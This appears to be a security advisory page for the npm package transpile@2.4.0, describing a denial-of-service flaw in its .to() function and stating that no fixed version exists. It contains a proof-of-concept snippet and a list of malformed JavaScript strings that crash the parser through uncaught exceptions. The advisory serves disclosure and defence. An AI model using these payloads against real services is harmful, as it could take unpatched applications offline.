transpile@2.4.0 vulnerabilities

Transpiles JavaScript modules from one format to another.

Direct Vulnerabilities

Known vulnerabilities in the transpile package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free
VulnerabilityVulnerable Version
  • M
Denial of Service (DoS)

transpile is a Transpiles JavaScript modules from one format to another.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a lack of input sanitization or whitelisting, coupled with improper exception handling in the .to() function.

PoC

Base code:

var transpile = require('transpile');
data = <string_here>
transpile.to({
            name: "mod",
            source: data,
            metadata: {format: "cjs"}
        }, "amd")

Possible payloads to replace <string_here>:

Rest parameter must be last formal parameter 
"o=(...D (...D wwequ 7equire'foo')" 

Invalid regular expression 
"!/var foo =var foo = require(var foo = require('fovar foo = require('foo')"  

Invalid left-hand side in for-loop
"for ('ofq(foo,reqor ('of"

Octal literals are not allowed in template strings.
"v`rcCoo('fk\\7oo')"

Invalid left-hand side in assignment
"var foo = ~e = foo equ= equi"

Invalid left-hand side in for-in
"for(fn^t in^suiS\re"

Unexpected quasi ...
"var`foo =i,var`fo"  

Unexpected Number
"var foo 5 reouire('fqo')"  
   
Unexpected token ILLEGAL
"re('fooqWb resuYxS\re)'"      

Label '...' has already been declared
"r; reqa: reqa:e;oo ; ; reqrequirr('fsreRo')"

Unexpected end of input
"ir%(f= r,)/" 

Unexpected string
"v')ar foo = require('fooequi')" 

How to fix Denial of Service (DoS)?

There is no fixed version for transpile.

*